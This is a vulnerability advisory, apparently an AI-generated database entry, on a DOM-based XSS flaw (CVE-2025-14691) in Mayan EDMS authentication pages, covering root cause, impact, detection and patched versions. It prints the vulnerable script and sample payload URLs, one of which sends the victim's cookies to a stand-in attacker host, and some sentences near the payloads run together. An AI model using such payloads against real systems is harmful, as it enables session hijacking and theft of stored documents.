
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14691 is a DOM-based Cross-Site Scripting (XSS) vulnerability in Mayan EDMS affecting the /authentication/ module. It was disclosed on December 14, 2025, and affects Mayan EDMS versions prior to 4.10.2, 4.9.7, 4.8.10, 4.7.8, and 4.6.12 across multiple release branches. The vulnerability is exploitable by unauthenticated remote attackers and requires user interaction (passive) to trigger. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 2.1 (Low) (GitHub Advisory, Feedly).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-94 (Improper Control of Code Generation). The vulnerability arises from insecure handling of window.location within client-side JavaScript templates: the application appends window.location.hash — which is fully attacker-controlled — into navigation logic without sanitization, allowing injection of arbitrary JavaScript (GitHub PoC). The vulnerable code pattern is:
if (typeof partialNavigation === 'undefined') {
document.write('<script type="text/undefined">')
const currentLocation = '#' + window.location.pathname + window.location.search;
const url = new URL(currentLocation, window.location.origin)
window.location = url;
}Multiple authentication-related endpoints are affected (e.g., /authentication/login/, /authentication/password/reset/) because they all rely on the same vulnerable JavaScript fragment. No authentication is required to craft a malicious URL (GitHub Advisory, GitHub PoC).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser within the context of the Mayan EDMS application. Potential consequences include theft of session cookies, hijacking of authenticated user sessions, performing unauthorized actions on behalf of the victim, and redirecting users to malicious websites. Availability is not impacted, and direct server-side compromise is not possible through this vector alone; however, session hijacking could enable further access to sensitive documents managed within the EDMS (GitHub Advisory, Feedly).
A public proof-of-concept exploit is available on GitHub, published by researcher ionutluca888, demonstrating the DOM-based XSS across multiple authentication endpoints (GitHub PoC). The EPSS score is approximately 0.088% (19th percentile), indicating a low but non-zero probability of exploitation in the wild within 30 days. No evidence of active in-the-wild exploitation or threat actor attribution has been reported, and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).
http://target/authentication/login/#javascript:alert("XSS")
or a more harmful payload such as:
http://target/authentication/login/#javascript:document.location='https://attacker.com/steal?c='+document.cookiewindow.location.hash without sanitization, causing the injected script to execute in the victim's browser context.#javascript: fragments./authentication/login/, /authentication/password/reset/, or related endpoints with URL fragments containing javascript: or encoded script payloads; unusual session activity following visits to these endpoints.The vendor has released patched versions addressing this vulnerability: 4.10.2, 4.9.7, 4.8.10, 4.7.8, and 4.6.12 for their respective release branches. Upgrading to the appropriate patched version is the recommended remediation. As interim mitigations, administrators should implement a strict Content Security Policy (CSP) header to restrict script execution sources, enforce input validation and output encoding, and educate users about phishing risks involving crafted URLs. The vendor confirmed the fix in version 4.10.2 and noted that backports for older versions were in progress (GitHub Advisory, Mayan EDMS Release Notes).
The vulnerability was assigned by VulDB and acknowledged by the Mayan EDMS vendor, who confirmed the fix in version 4.10.2 and committed to backporting patches for older supported versions. The issue received coverage from security aggregators including INCIBE-CERT and was noted in ISC StormCast for December 15, 2025. Community reaction has been limited given the low severity rating, with no significant researcher commentary or media coverage beyond standard vulnerability tracking (Feedly, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."